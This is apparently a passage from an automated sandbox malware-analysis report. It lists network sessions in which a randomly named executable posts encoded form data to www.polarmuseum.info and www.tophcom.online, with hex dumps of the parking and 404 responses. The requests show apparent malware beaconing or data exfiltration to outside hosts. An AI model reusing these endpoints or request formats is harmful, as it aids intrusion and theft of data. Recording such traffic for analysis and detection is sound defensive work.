                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ==
                                                                                                                              set-cookie: parking_session=00f535aa-9e66-4c9d-894c-b1c9c6de65f3; expires=Tue, 22 Oct 2024 03:55:00 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 6d 4e 58 64 6a 46 42 50 6d 71 75 38 52 70 7a 75 49 52 48 43 63 68 52 69 4a 57 55 55 54 32 38 39 53 68 6f 76 67 2f 4c 77 70 71 47 64 58 75 77 61 6f 47 52 2b 45 4f 38 51 37 76 68 41 31 64 52 2b 39 32 73 49 2f 72 55 4e 4e 2f 69 57 57 59 33 58 7a 34 72 71 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Oct 22, 2024 05:40:00.197283030 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDBmNTM1YWEtOWU2Ni00YzlkLTg5NGMtYjFjOWM2ZGU2NWYzIiwicGFnZV90aW1lIjoxNzI5NTY4ND


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              18192.168.2.649990199.59.243.227805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:02.088193893 CEST689OUTPOST /rul7/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.polarmuseum.info
                                                                                                                              Origin: http://www.polarmuseum.info
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 233
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.polarmuseum.info/rul7/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 46 75 4f 30 41 7a 52 43 75 2b 61 79 65 58 74 58 50 44 6f 69 76 33 48 33 43 34 41 69 64 69 6d 39 32 43 36 56 52 47 56 64 4e 77 4a 6e 55 63 32 35 6d 32 65 45 58 35 50 37 43 6d 64 33 63 46 6f 31 67 59 69 72 38 47 33 48 4a 52 62 59 41 4e 46 31 79 77 59 70 71 4a 73 2b 51 66 58 71 57 38 4f 31 39 58 42 4c 73 57 72 5a 6d 50 45 72 6d 6c 4f 6c 6d 6b 71 30 76 2f 37 65 76 77 2f 51 59 30 55 76 2b 54 4a 6d 62 72 30 55 54 49 52 33 6f 74 59 4f 6e 48 2b 50 38 2f 44 74 63 37 37 45 70 2f 32 38 71 33 41 73 4c 2b 7a 52 44 57 72 71 31 72 49 62 55 4f 61 6c 6d 30 47 33 4c 75 48 6a 33 75 74 59 74 59 31 76 48 55 69 48 53 34 79 4e 75 4e 44 76 58 4a 67 4c 4a 51 70 7a 6f 63 66 4e 49 65 7a 57 39 77 3d 3d
                                                                                                                              Data Ascii: kT9p=FuO0AzRCu+ayeXtXPDoiv3H3C4Aidim92C6VRGVdNwJnUc25m2eEX5P7Cmd3cFo1gYir8G3HJRbYANF1ywYpqJs+QfXqW8O19XBLsWrZmPErmlOlmkq0v/7evw/QY0Uv+TJmbr0UTIR3otYOnH+P8/Dtc77Ep/28q3AsL+zRDWrq1rIbUOalm0G3LuHj3utYtY1vHUiHS4yNuNDvXJgLJQpzocfNIezW9w==
                                                                                                                              Oct 22, 2024 05:40:02.733761072 CEST1236INHTTP/1.1 200 OK
                                                                                                                              date: Tue, 22 Oct 2024 03:40:01 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1134
                                                                                                                              x-request-id: ca6fa42a-41a0-4d0e-82ef-538e71991792
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ==
                                                                                                                              set-cookie: parking_session=ca6fa42a-41a0-4d0e-82ef-538e71991792; expires=Tue, 22 Oct 2024 03:55:02 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 6d 4e 58 64 6a 46 42 50 6d 71 75 38 52 70 7a 75 49 52 48 43 63 68 52 69 4a 57 55 55 54 32 38 39 53 68 6f 76 67 2f 4c 77 70 71 47 64 58 75 77 61 6f 47 52 2b 45 4f 38 51 37 76 68 41 31 64 52 2b 39 32 73 49 2f 72 55 4e 4e 2f 69 57 57 59 33 58 7a 34 72 71 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Oct 22, 2024 05:40:02.733792067 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2E2ZmE0MmEtNDFhMC00ZDBlLTgyZWYtNTM4ZTcxOTkxNzkyIiwicGFnZV90aW1lIjoxNzI5NTY4ND


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              19192.168.2.649991199.59.243.227805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:04.640197992 CEST1702OUTPOST /rul7/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.polarmuseum.info
                                                                                                                              Origin: http://www.polarmuseum.info
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 1245
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.polarmuseum.info/rul7/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 46 75 4f 30 41 7a 52 43 75 2b 61 79 65 58 74 58 50 44 6f 69 76 33 48 33 43 34 41 69 64 69 6d 39 32 43 36 56 52 47 56 64 4e 77 42 6e 55 76 2b 35 6e 56 32 45 46 4a 50 37 4f 47 64 32 63 46 6f 6f 67 59 61 6e 38 44 76 35 4a 54 7a 59 42 75 4e 31 37 6c 73 70 68 4a 73 2b 53 66 58 33 49 4d 4f 61 39 58 77 41 73 57 37 5a 6d 50 45 72 6d 6a 69 6c 78 6c 71 30 38 76 37 64 6f 77 2f 6d 63 30 55 48 2b 54 51 64 62 71 41 71 51 38 6c 33 72 4e 49 4f 6d 30 57 50 2f 66 44 76 49 62 37 63 70 2f 72 6d 71 32 74 56 4c 2b 76 2f 44 52 4c 71 32 4e 56 79 42 4e 76 37 2f 45 4f 79 4c 76 6a 31 2f 65 70 42 33 70 46 7a 55 47 57 31 4d 61 36 37 6d 62 58 6e 58 36 74 35 41 57 56 69 69 62 61 53 4f 65 32 62 71 79 6f 46 56 43 67 71 45 6d 38 51 52 61 39 78 5a 59 72 6d 2b 2f 46 6f 44 38 7a 32 73 67 6b 64 36 6a 74 49 4d 75 4a 4e 4a 4d 62 64 61 2f 4b 32 63 32 61 4a 48 57 61 4d 51 43 78 62 6f 58 6c 35 31 66 31 69 52 46 32 58 75 6a 65 2b 77 58 42 62 78 49 36 2b 36 37 70 44 61 57 41 37 67 6a 38 63 35 41 6f 43 72 6a 37 78 5a 45 45 39 48 [TRUNCATED]
                                                                                                                              Data Ascii: kT9p=FuO0AzRCu+ayeXtXPDoiv3H3C4Aidim92C6VRGVdNwBnUv+5nV2EFJP7OGd2cFoogYan8Dv5JTzYBuN17lsphJs+SfX3IMOa9XwAsW7ZmPErmjilxlq08v7dow/mc0UH+TQdbqAqQ8l3rNIOm0WP/fDvIb7cp/rmq2tVL+v/DRLq2NVyBNv7/EOyLvj1/epB3pFzUGW1Ma67mbXnX6t5AWViibaSOe2bqyoFVCgqEm8QRa9xZYrm+/FoD8z2sgkd6jtIMuJNJMbda/K2c2aJHWaMQCxboXl51f1iRF2Xuje+wXBbxI6+67pDaWA7gj8c5AoCrj7xZEE9HkQSleEciiTSaBwM7NKvEKVhdLX4RnuAJMDhYkfqMlHiKPFs8RJt/YYbkFvfy620GpWblV2K8zfzkQRSHLbNevYlAanYBrKtxdPQAn+szA2alddxlFgf9XjKPahsi1wxvhR0cjENYP4bI2Gwt2lENkef0GxoLzqohM8P1jzJyBqpqtzbZOpRKEs3FD+V/+nOCezlCi4zHesGsSuTmA2YOKRdCAjUImrKcU6vj1C5RtHIc6DgYuBvguJKv/jJor2/rlSF8XR8XzSHwe/d8IQoc/Jma/TcohY9SAdBW6tC2SVgqQRlPk+haAYtMv/ZrWQB8X43XzT17KAn6Tp7DknVP3on3jgDQhW/kCgW6LwclcunFT+zDN79xFbhOY4rc1eHBQ+4FkYW6dCR4ofvpqEAMxCCFrlSQDSHMCk7T8NlSyYuhFo0fLhgAGO9qzaaZXM/qjI46xR6zIaRdBFqPEypsbnKVKOgMWJl+jpeALNTe4XGolIfmzXByP7avXcjge1gYPN0MWbODMGnsauhAF8jma8X4ZtYD+12WP0zkTU4Zgr7vLlO1bqgYhZBc2+LvltCxnBzl0wWR3PvCjDhUjsJmo4cbuHcKPA5GsEG8kL1Jq5TbWn5/TfbjHAIwG+SrP4ijR3MHxVpAyB2JNCAC7UmOFU6HWAXigqHwG4 [TRUNCATED]
                                                                                                                              Oct 22, 2024 05:40:05.254085064 CEST1236INHTTP/1.1 200 OK
                                                                                                                              date: Tue, 22 Oct 2024 03:40:04 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1134
                                                                                                                              x-request-id: 640c0049-4bf7-43a6-9ba0-4addf25702cd
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ==
                                                                                                                              set-cookie: parking_session=640c0049-4bf7-43a6-9ba0-4addf25702cd; expires=Tue, 22 Oct 2024 03:55:05 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 6d 4e 58 64 6a 46 42 50 6d 71 75 38 52 70 7a 75 49 52 48 43 63 68 52 69 4a 57 55 55 54 32 38 39 53 68 6f 76 67 2f 4c 77 70 71 47 64 58 75 77 61 6f 47 52 2b 45 4f 38 51 37 76 68 41 31 64 52 2b 39 32 73 49 2f 72 55 4e 4e 2f 69 57 57 59 33 58 7a 34 72 71 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Oct 22, 2024 05:40:05.254111052 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjQwYzAwNDktNGJmNy00M2E2LTliYTAtNGFkZGYyNTcwMmNkIiwicGFnZV90aW1lIjoxNzI5NTY4ND


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              20192.168.2.649992199.59.243.227805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:07.178186893 CEST410OUTGET /rul7/?kT9p=IsmUDGhGjZ2KRgAKfB1HvhyyLqsJdQP3pRKzZVZQCTxvTYvFu3rbLrLYLQVbGlcBi+aKp17AAiqCJ8w25lZIlYoTQ+zVINLm/1UHvGbwh9Y2v06871qB8K3SuXDNUGwH3DJAZfI=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.polarmuseum.info
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Oct 22, 2024 05:40:07.806710958 CEST1236INHTTP/1.1 200 OK
                                                                                                                              date: Tue, 22 Oct 2024 03:40:06 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1526
                                                                                                                              x-request-id: a4688cc9-93e8-4232-9867-4a5ca3b2c163
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sACFLjaLOEFJc/49fchXBg+xdraI8I2hTEbyHhaOZP1YxwL+Jkk53taNPFZhh6PXCsKf/hvemf5BbwcSHEUXMQ==
                                                                                                                              set-cookie: parking_session=a4688cc9-93e8-4232-9867-4a5ca3b2c163; expires=Tue, 22 Oct 2024 03:55:07 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 73 41 43 46 4c 6a 61 4c 4f 45 46 4a 63 2f 34 39 66 63 68 58 42 67 2b 78 64 72 61 49 38 49 32 68 54 45 62 79 48 68 61 4f 5a 50 31 59 78 77 4c 2b 4a 6b 6b 35 33 74 61 4e 50 46 5a 68 68 36 50 58 43 73 4b 66 2f 68 76 65 6d 66 35 42 62 77 63 53 48 45 55 58 4d 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sACFLjaLOEFJc/49fchXBg+xdraI8I2hTEbyHhaOZP1YxwL+Jkk53taNPFZhh6PXCsKf/hvemf5BbwcSHEUXMQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Oct 22, 2024 05:40:07.806770086 CEST979INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTQ2ODhjYzktOTNlOC00MjMyLTk4NjctNGE1Y2EzYjJjMTYzIiwicGFnZV90aW1lIjoxNzI5NTY4ND


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              21192.168.2.649993162.213.249.216805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:12.850466967 CEST659OUTPOST /w48t/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.tophcom.online
                                                                                                                              Origin: http://www.tophcom.online
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 209
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.tophcom.online/w48t/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 75 4c 33 65 74 44 69 47 49 75 44 53 66 66 58 6a 35 77 46 35 39 38 32 49 71 31 55 6c 56 54 52 73 58 45 75 38 78 34 49 70 4b 4d 68 43 67 6a 50 39 6e 47 70 48 51 6c 30 2b 6a 76 62 37 30 53 4f 67 4f 56 56 64 58 39 72 62 69 42 2f 42 66 55 42 6b 4c 2f 71 33 30 73 4a 49 76 67 64 2b 44 73 79 47 4e 75 2f 57 56 57 57 77 64 71 34 30 78 72 76 57 39 63 34 48 57 49 4a 69 6f 73 45 57 61 66 6c 37 52 39 69 4f 4e 72 6c 72 39 6a 4b 42 50 45 68 44 45 76 62 43 48 6b 63 63 37 77 44 31 59 72 64 52 71 43 6f 4d 51 36 42 6e 62 39 6b 33 69 61 78 46 56 79 44 2b 51 6d 39 4c 55 4e 6a 53 71 61 71 39 5a 50 35 72 53 4d 5a 72 39 74 2f 34
                                                                                                                              Data Ascii: kT9p=uL3etDiGIuDSffXj5wF5982Iq1UlVTRsXEu8x4IpKMhCgjP9nGpHQl0+jvb70SOgOVVdX9rbiB/BfUBkL/q30sJIvgd+DsyGNu/WVWWwdq40xrvW9c4HWIJiosEWafl7R9iONrlr9jKBPEhDEvbCHkcc7wD1YrdRqCoMQ6Bnb9k3iaxFVyD+Qm9LUNjSqaq9ZP5rSMZr9t/4
                                                                                                                              Oct 22, 2024 05:40:13.554639101 CEST533INHTTP/1.1 404 Not Found
                                                                                                                              Date: Tue, 22 Oct 2024 03:40:13 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
